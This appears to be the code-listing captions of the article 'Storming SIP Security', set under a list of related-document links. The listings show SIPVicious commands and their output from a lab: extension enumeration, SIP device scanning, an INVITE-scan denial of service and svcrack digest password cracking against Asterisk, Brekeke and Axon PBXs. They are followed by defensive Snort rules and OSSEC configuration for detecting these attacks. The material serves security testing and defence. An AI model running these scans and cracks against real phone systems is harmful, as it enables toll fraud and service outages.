Storming SIP Security Captions



Similar documents
AGILE SIP TRUNK IP-PBX Connection Manual (Asterisk)

VoIP Fraud Analysis. Simwood esms Limited Tel:

AGILE SIP TRUNK IP- PBX Connection Manual (Asterisk, Trixbox)

SIP Trunk 2 IP-PBX User Guide Asterisk. Ver /08/01 Ver /09/17 Ver /10/07 Ver /10/15 Ver1.0.

TECHNICAL SUPPORT NOTE. 3-Way Call Conferencing with Broadsoft - TA900 Series

SIP Basics. CSG VoIP Workshop. Dennis Baron January 5, Dennis Baron, January 5, 2005 Page 1. np119

SIP Trunking & Peering Operation Guide

Three-Way Calling using the Conferencing-URI

Grandstream Networks, Inc. GXP2130/2140/2160 Auto-configuration Plug and Play

Asterisk with Twilio Elastic SIP Trunking Interconnection Guide using Secure Trunking (SRTP/TLS)

Hacking Trust Relationships of SIP Gateways

SIP: Session Initiation Protocol. Copyright by Elliot Eichen. All rights reserved.

Storming SIP Security

PORTA ONE. Porta Switch. Handbook: Residential VoIP Services Maintenance Release 24.

Basic Xten Pro Configuration

Technical Communication 1201 Norphonic emergency rugged telephone on Alcatel-Lucent OmniPCX Enterprise

Handbook: Residential VoIP and IP Centrex Services Maintenance Release 23

Transbox. User Manual

SIP ALG - Session Initiated Protocol Applications- Level Gateway

For internal circulation of BSNL only

Part II. Prof. Ai-Chun Pang Graduate Institute of Networking and Multimedia, Dept. of Comp. Sci. and Info. Engr., National Taiwan University

OpenSIPS For Asterisk Users

IP Office 4.2 SIP Trunking Configuration Guide AT&T Flexible Reach and AT&T Flexible Reach with Business in a Box (SM)

SIP Essentials Training

SIP: Protocol Overview

PORTA ONE. Porta Switch. Handbook: Residential VoIP Services Maintenance Release 23.

Session Initiation Protocol (SIP) 陳 懷 恩 博 士 助 理 教 授 兼 計 算 機 中 心 資 訊 網 路 組 組 長 國 立 宜 蘭 大 學 資 工 系 TEL: # 340

Request for Comments: August 2006

Denial of Services on SIP VoIP infrastructures

Media Gateway Controller RTP

Hacking / Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions / Endler & Collier / Enumerating a VoIP Network

Avaya IP Office 4.0 Customer Configuration Guide SIP Trunking Configuration For Use with Cbeyond s BeyondVoice with SIPconnect Service

PORTA ONE. PortaSwitch Handbook: SIP Services Maintenance Release 16. Part I.

Session Initiation Protocol (SIP) Chapter 5

2 ports GSM/VoIP PCI Card. User Manual

Session Initiation Protocol

SIP Introduction. Jan Janak

Formación en Tecnologías Avanzadas

VoIP Fundamentals. SIP In Depth

SIP Session Initiation Protocol Nicolas Montavont

MV-374 / MV-378. VoIP GSM Gateway. User Manual

BROADWORKS SIP ACCESS SIDE EXTENSIONS INTERFACE SPECIFICATIONS RELEASE Version 1

Application Notes for IDT Net2Phone SIP Trunking Service with Avaya IP Office Issue 1.0

SIP Session Initiation Protocol

NTP VoIP Platform: A SIP VoIP Platform and Its Services

MV-372. VoIP GSM Gateway. User Manual

Radius/LDAP authentication in open-source IP PBX

3.1 SESSION INITIATION PROTOCOL (SIP) OVERVIEW

How To Use Sip On A Pc Or Mac Or Ipod (For A Premium) For Free On A Sim Sims Or Ipo (For Free) For A Long Distance Connection (For Psp) For Your Ipo Or Ipos

VoIP fraud methods used on the Internet today

IP Office Technical Tip

How To Send A Connection From A Proxy To A User Agent Server On A Web Browser On A Pc Or Mac Or Ipad (For A Mac) On A Network With A Webmail Web Browser (For Ipad) On An Ipad Or

Application Notes for Configuring SIP Trunking between McLeodUSA SIP Trunking Solution and an Avaya IP Office Telephony Solution 1.

Enabling Security Features in Firmware DGW v2.0 June 22, 2011

How To Understand The Purpose Of A Sip Aware Firewall/Alg (Sip) With An Alg (Sip) And An Algen (S Ip) (Alg) (Siph) (Network) (Ip) (Lib

internet technologies and standards

MV-374 / MV-378. VoIP GSM Gateway. User Manual

3GPP TS V8.1.0 ( )

Interoperability between IPv4 and IPv6 SIP User Agents

Session Initiation Protocol (SIP)

Voice over IP & Other Multimedia Protocols. SIP: Session Initiation Protocol. IETF service vision. Advanced Networking

IP-Telephony SIP & MEGACO

Analysis of a VoIP Attack

MV-370 / MV-372. VoIP GSM Gateway. User Manual

Voice over IP (SIP) Milan Milinković

SIP for Voice, Video and Instant Messaging

ASTERISK. Goal. Prerequisites. Asterisk IP PBX Configuration

Transparent weaknesses in VoIP

Configuring the Cisco SPA8800 IP Telephony Gateway in an Asterisk Environment

VoIP. What s Voice over IP?

ARCHITECTURES TO SUPPORT PSTN SIP VOIP INTERCONNECTION

Multimedia & Protocols in the Internet - Introduction to SIP

SIP Security. ENUM-Tag am 28. September in Frankfurt. Prof. Dr. Andreas Steffen. Agenda.

ETSI TS V8.2.0 ( ) Technical Specification

Session Initiation Protocol and Services

Internet Engineering Task Force (IETF) Request for Comments: 7088 Category: Informational February 2014 ISSN:

VoIP some threats, security attacks and security mechanisms. Lars Strand RiskNet Open Workshop Oslo, 24. June 2009

Session Initiation Protocol

Black Hat Briefings 2007 Las Vegas. White Paper on Vulnerabilities in Dual-mode/Wi-Fi Phones

Deployment of Snort IDS in SIP based VoIP environments

Session Initiation Protocol (SIP)

Man-in-the-Middle Attack on T-Mobile Wi-Fi Calling

Manual. ABTO Software

Telecommunication Services Engineering (TSE) Lab. Chapter V. SIP Technology For Value Added Services (VAS) in NGNs

An outline of the security threats that face SIP based VoIP and other real-time applications

ETSI TS V ( )

Penetration Testing SIP Services

NTP VoIP Platform: A SIP VoIP Platform and Its Services 1

JJ Technical Specification on Called Party Subaddress Information Interface between Private SIP Networks. First Edition

Protect Yourself Against VoIP Hacking. Mark D. Collier Chief Technology Officer SecureLogix Corporation

SIP Trunking. Service Guide. Learn More: Call us at

Ecessa Proxy VoIP Manual

Transcription:

Storming SIP Security Captions Listing 1. Running svwar with default options on the target Asterisk PBX./svwar.py 192.168.1.107 Extension Authentication ------------------------------ 502 reqauth 503 reqauth 500 reqauth 501 reqauth Listing 2. SIP request and response for non-existing extension on Asterisk: Request: REGISTER sip:3040523113@192.168.1.107 SIP/2.0 localhost:5060;branch=z9hg4bk-2069162775;rport From: "3040523113"<sip:3040523113@192.168.1.107>; tag=3040523113 To: "3040523113"<sip:3040523113@192.168.1.107> Call-ID: 3085490902 Response: SIP/2.0 404 Not found localhost:5060;branch=z9hg4bk-2069162775;received=192.168.1.137;rport=5060 From: "3040523113"<sip:3040523113@192.168.1.107>; tag=3040523113 To: "3040523113"<sip:3040523113@192.168.1.107>;tag=as28c4ddbd Call-ID: 3085490902 User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Listing 3. SIP request and response for an existing extension on Asterisk: Request: REGISTER sip:500@192.168.1.107 SIP/2.0 localhost:5060;branch=z9hg4bk-2006064845;rport From: "500"<sip:500@192.168.1.107>; tag=500 To: "500"<sip:500@192.168.1.107> Call-ID: 2173812312 Response: SIP/2.0 401 Unauthorized localhost:5060;branch=z9hg4bk-2006064845;received=192.168.1.137;rport=5060 From: "500"<sip:500@192.168.1.107>; tag=500

To: "500"<sip:500@192.168.1.107>;tag=as51e86a12 Call-ID: 2173812312 User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY WWW-Authenticate: Digest algorithm=md5, realm="asterisk", nonce="0cf87917" Listing 4. SIP request and response for a non-existent extension on Brekeke: Request: REGISTER sip:954434603@192.168.1.112 SIP/2.0 localhost:5060;branch=z9hg4bk-880229315;rport From: "954434603"<sip:954434603@192.168.1.112>; tag=954434603 To: "954434603"<sip:954434603@192.168.1.112> Call-ID: 3944038278 Response: SIP/2.0 403 Forbidden localhost:5060;branch=z9hg4bk-2872701808;rport=5060;received=192.168.1.137 From: "957276076"<sip:957276076@192.168.1.112>; tag=957276076 To: "957276076"<sip:957276076@192.168.1.112>;tag=1195922819781-287064365 Call-ID: 419342183 Expires: 3600 Listing 5. SIP request and response for an existing extension on Brekeke: Request: REGISTER sip:100@192.168.1.112 SIP/2.0 localhost:5060;branch=z9hg4bk-1040867784;rport From: "100"<sip:100@192.168.1.112>; tag=100 To: "100"<sip:100@192.168.1.112> Call-ID: 4105598360 Response: SIP/2.0 403 Forbidden localhost:5060;branch=z9hg4bk-1040867784;rport=5060;received=192.168.1.137 From: "100"<sip:100@192.168.1.112>; tag=100 To: "100"<sip:100@192.168.1.112>;tag=1195923050546-1029869379 Call-ID: 4105598360 Expires: 3600 Listing 6. Running svwar with default options on the target Brekeke

./svwar.py 192.168.1.112 -p5060 -e100,999 ERROR:TakeASip:SIP server replied with an authentication request for an unknown extension. Set --force to force a scan. WARNING:root:found nothing Listing 7. SIP request and response for an existing extension on Brekeke: Request OPTIONS sip:2320844626@192.168.1.112 SIP/2.0 localhost:5060;branch=z9hg4bk-529132572;rport From: "2320844626"<sip:2320844626@192.168.1.112>; tag=2320844626 To: "2320844626"<sip:2320844626@192.168.1.112> CSeq: 1 OPTIONS Call-ID: 3796474084 Reply SIP/2.0 404 Not Found localhost:5060;branch=z9hg4bk-529132572;rport=5060;received=192.168.1.137 From: "2320844626"<sip:2320844626@192.168.1.112>; tag=2320844626 To: "2320844626"<sip:2320844626@192.168.1.112>;tag=1195924895187-1065907948 Call-ID: 3796474084 CSeq: 1 OPTIONS Listing 8. SIP request and response for an existing extension on Brekeke: Request OPTIONS sip:100@192.168.1.112 SIP/2.0 localhost:5060;branch=z9hg4bk-3888338510;rport From: "100"<sip:100@192.168.1.112>; tag=100 To: "100"<sip:100@192.168.1.112> CSeq: 1 OPTIONS Call-ID: 3442323100 Reply SIP/2.0 200 OK localhost:5060;branch=z9hg4bk-3888338510;rport=5060;received=192.168.1.137 Record-Route: <sip:192.168.1.112:5060;lr> Contact: <sip:100@192.168.1.112:5060> To: "100"<sip:100@192.168.1.112>;tag=3132875a From: "100"<sip:100@192.168.1.112>;tag=100 Call-ID: 3442323100 CSeq: 1 OPTIONS Accept-Language: en Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUB- SCRIBE, INFO User-Agent: X-Lite release 1011s stamp 41150 Listing 9. Running svwar with an OPTIONS method on the target Brekeke

./svwar.py 192.168.1.112 -m OPTIONS Extension Authentication ------------------------------ 100 noauth Listing 10. Running svwar with an INVALID method on the target Brekeke./svwar.py 192.168.1.112 -m INVALID WARNING:TakeASip:extension '100' probably exists but the response is unexpected Extension Authentication ------------------------------ 100 weird Listing 11. SIP request and response to a provider Request INVITE sip:4717081@sipprovider.com SIP/2.0 192.168.1.112:11004;branch=z9hG4bK-d87543-6913025e904f0c60-1--d87543-;rport Contact: <sip:100@88.88.88.88:11004> To: "sip:4717081@sipprovider.com"<sip:4717081@sipprovider.com> From: "hello there"<sip:100@192.168.1.112>;tag=1626f92e Call-ID: MmQ4Yjc2ODVmODc0OGRiMGU0NTNlMjYzM2M5MzgxMDg. CSeq: 1 INVITE Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUB- SCRIBE, INFO Content-Type: application/sdp User-Agent: X-Lite release 1011s stamp 41150 Content-Length: 574 v=0 o=- 1 2 IN IP4 192.168.1.112 s=counterpath X-Lite 3.0 c=in IP4 192.168.1.112 t=0 0 m=audio 58524 RTP/AVP 107 119 100 106 0 105 98 8 101 a=alt:1 4 : wsa5el8d /gs0kkpy 192.168.1.112 58524 a=alt:2 3 : 1Zarlwxs ys09apqd 192.168.1.113 58524 a=alt:3 2 : EEGF4svE BA7VvsFr 192.168.88.1 58524 a=alt:4 1 : YplH5tSl Bbgx4Fkl 192.168.31.1 58524 a=fmtp:101 0-15 a=rtpmap:107 BV32/16000 a=rtpmap:119 BV32-FEC/16000 a=rtpmap:100 SPEEX/16000 a=rtpmap:106 SPEEX-FEC/16000 a=rtpmap:105 SPEEX-FEC/8000 a=rtpmap:98 ilbc/8000 a=rtpmap:101 telephone-event/8000 a=sendrecv Reply SIP/2.0 407 Proxy Authentication Required

192.168.1.112:11004;received=88.88.88.88;branch=z9hG4bK-d87543-6913025e904f 0c60-1--d87543-;rport=11004 To: "sip:4717081@sipprovider.com"<sip:4717081@sipprovider.com>;tag=fe1721141f05 bd30d4b50c70da3ae228.3f78 From: "hello there"<sip:100@192.168.1.112>;tag=1626f92e Call-ID: MmQ4Yjc2ODVmODc0OGRiMGU0NTNlMjYzM2M5MzgxMDg. CSeq: 1 INVITE Proxy-Authenticate: Digest realm="sipprovider.com", nonce="4749b3a27877875af917a9b093f525059c4e7f26" Listing 12. Running svmap to look for SIP phones./svmap.py 192.168.1.1/24 SIP Device User Agent ------------------------------------------------------ 192.168.1.111:5060 3CXPhoneSystem 192.168.1.137:5060 SJphone/1.60.299a/L (SJ Labs) 192.168.1.112:5060 unknown Figure 6. Figure 7 Listing 13. Running svmap to look for SIP phones on non-standard port./svmap.py 192.168.1.112 -v -p 1024-65535 INFO:root:start your engines INFO:DrinkOrSip:192.168.1.112:1169 -> 192.168.1.112:1169 -> unknown INFO:DrinkOrSip:192.168.1.112:1169 -> 192.168.1.112:1169 -> unknown ^CWARNING:root:caught your control^c - quiting INFO:root:we have 1 devices SIP Device User Agent ----------------------------------- 192.168.1.112:1169 unknown INFO:root:Total time: 0:00:04.642724 Listing 14. Running svwar to identify valid user on sip phone./svwar.py -p 1169 192.168.1.112 -m INVITE Extension Authentication ------------------------------ 100 noauth

Listing 15. Using svmap to cause a Denial of Service./svmap.py 192.168.1.1/24 -m INVITE SIP Device User Agent ------------------------------------------------------ 192.168.1.137:5060 SJphone/1.60.299a/L (SJ Labs) 192.168.1.138:5060 SJphone/1.60.299a/L (SJ Labs) 192.168.1.139:5060 SJphone/1.60.299a/L (SJ Labs) 192.168.1.143:5060 SJphone/1.60.299a/L (SJ Labs) 192.168.1.144:5060 SJphone/1.60.299a/L (SJ Labs) Figure 8 Listing 16. Normal REGISTER authentication REGISTER sip:192.168.1.112:5061 SIP/2.0 192.168.1.137:54626;branch=z9hG4bK-d87543-68bf985f94f5330f-1--d87543-;rport Contact: <sip:112@192.168.1.137:54626;rinstance=f66415b8af63c496> To: "112"<sip:112@192.168.1.112:5061> From: "112"<sip:112@192.168.1.112:5061>;tag=547fb56f Call-ID: OTIyZjEzNWFhMDkzNzJkNTdmMGFlMTZiYWRmMGM3ZmU. Expires: 3600 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUB- SCRIBE, INFO User-Agent: X-Lite release 1011b stamp 39984 SIP/2.0 401 Unauthorized 192.168.1.137:54626;branch=z9hG4bK-d87543-68bf985f94f5330f-1--d87543-;rport To: "112"<sip:112@192.168.1.112:5061> From: "112"<sip:112@192.168.1.112:5061>;tag=547fb56f Call-ID: OTIyZjEzNWFhMDkzNzJkNTdmMGFlMTZiYWRmMGM3ZmU. User-Agent: NCH Swift Sound Axon 1.20 WWW-Authenticate: Digest realm="axon@stevo",nonce="v8234qaq441w",opaque="",stale=false,algorithm=md5 REGISTER sip:192.168.1.112:5061 SIP/2.0 192.168.1.137:54626;branch=z9hG4bK-d87543-b428490068361767-1--d87543-;rport Contact: <sip:112@192.168.1.137:54626;rinstance=f66415b8af63c496> To: "112"<sip:112@192.168.1.112:5061> From: "112"<sip:112@192.168.1.112:5061>;tag=547fb56f Call-ID: OTIyZjEzNWFhMDkzNzJkNTdmMGFlMTZiYWRmMGM3ZmU. CSeq: 2 REGISTER Expires: 3600 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO User-Agent: X-Lite release 1011b stamp 39984 Authorization: Digest username="112",realm="axon@stevo",nonce="v8234qaq441w",uri="sip:192.168.1.112:50 61",response="270dd9dab3671b6f3dd921d8a52ed108",algorithm=MD5,opaque=""

SIP/2.0 200 OK 192.168.1.137:54626;branch=z9hG4bK-d87543-b428490068361767-1--d87543-;rport To: "112"<sip:112@192.168.1.112:5061> From: "112"<sip:112@192.168.1.112:5061>;tag=547fb56f Call-ID: OTIyZjEzNWFhMDkzNzJkNTdmMGFlMTZiYWRmMGM3ZmU. CSeq: 2 REGISTER User-Agent: NCH Swift Sound Axon 1.20 Contact: <sip:192.168.1.137>;expires=3468;q=0.5 Contact: <sip:112@192.168.1.137:49388;rinstance=8b5f68f72e026d2a>;expires=3572;q=0.5 Contact: <sip:112@192.168.1.137:54626;rinstance=f66415b8af63c496>;expires=3600;q=0.5 Listing 17. Same nonce, different response nonce="v8234qaq441w",response="76e68eedd53ec6fc4510d251e72170fa" nonce="v8234qaq441w",response="dd7d3a7fd35f6de6b8b125ea8654fb5d" nonce="v8234qaq441w",response="2d509f73e75d93b3d68926824c99a8c3" nonce="v8234qaq441w",response="c12e0e0ea9c3d279c2e9970b3d2014a1" Listing 18. Using svcrack with the optimization enabled./svcrack.py 192.168.1.112 -u112 -p5061 -n -r111,222,333,999 Extension Password ------------------------ 112 999 Listing 19. Snort rules by Snocer Rule for alerting of INVITE flood attack: (msg:"invite message flooding"; content:"invite"; depth:6; \ threshold: type both, track by_src, count 100, seconds 60; \ sid:5000004; rev:1;) Rule for alerting of REGISTER flood attack: (msg:"register message flooding"; content:"register"; depth:8; \ threshold: type both, track by_src, count 100, seconds 60; \ sid:5000005; rev:1;) Threshold rule for unauthorized responses: (msg:"invite message flooding"; \ content:"sip/2.0 401 Unauthorized"; depth:24; \ threshold: type both, track by_src, count 100, seconds 60; \ sid:5000009; rev:1;) Listing 20. Additional custom Snort rules Rule for alerting of OPTIONS scan or flood attack: alert ip any any -> $HOME_NET $SIP_PROXY_PORTS \ (msg:"options SIP scan"; content:"options"; depth:7; \

threshold: type both, track by_src, count 30, seconds 3; \ sid:5000004; rev:1;) Some more response rules: (msg:"excessive number of SIP 4xx Responses - possible user or password guessing attack"; \ pcre:"/^sip\/2.0 4\d{2}"; \ threshold: type both, track by_src, count 100, seconds 60; \ sid:5000009; rev:1;) Detecting the "ghost phone call" attack: (msg:"ghost call attack"; \ content:"sip/2.0 180"; depth:11; \ threshold: type both, track by_src, count 100, seconds 60; \ sid:5000009; rev:1;) Listing 21. OSSEC Configuration - /var/ossec/rules/asterisk.xml <group name="asterisk,"> <rule id="102000" level="0"> <description>grouping of Asterisk rules</description> <decoded_as>asterisk</decoded_as> <rule id="102002" level="0"> <match>username/auth name mismatch</match> <description>an unknown username</description> <if_sid>102000</if_sid> <rule id="102003" level="10" frequency="10" timeframe="600"> <if_matched_sid>102002</if_matched_sid> <description>enumeration of users on asterisk in process</ description> <rule id="102004" level="6"> <if_sid>102000</if_sid> <match>wrong password</match> <description>someone got the password wrong</description> <rule id="102006" level="10" frequency="10" timeframe="600"> <if_matched_sid>102004</if_matched_sid> <description>a password cracking attack in process</description> </group> Listing 22. OSSEC modifications to enable the rule box # vi /var/ossec/etc/ossec.conf Then add a line in the include section to include the new Asterisk ruleset: <include>asterisk.xml</include> box # vi /var/ossec/etc/decoder.conf

Then add a line in the include section to include the new Asterisk ruleset: <decoder name="asterisk"> <program_name>^asterisk</program_name> </decoder> <decoder name="asterisk-denied"> <parent>asterisk</parent> <prematch>registration from </prematch> <regex offset="after_prematch">failed for '(\d+.\d+.\d+.\d+)'</regex> <order>srcip</order> </decoder> Once OSSEC has been set, restart the service: box # /etc/init.d/ossec restart Stopping OSSEC: [ OK ] Starting OSSEC: [ OK ] Asterisk needs to be configured to log to syslog so that the log entries can be picked up with OSSEC. If this is not already the case, then run the following commands to enable this functionality. box # echo "syslog.local0 => notice,warning,error" >> /etc/asterisk/logger.conf box # /etc/init.d/asterisk restart Shutting down asterisk: [ OK ] Starting asterisk: [ OK ] box #

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information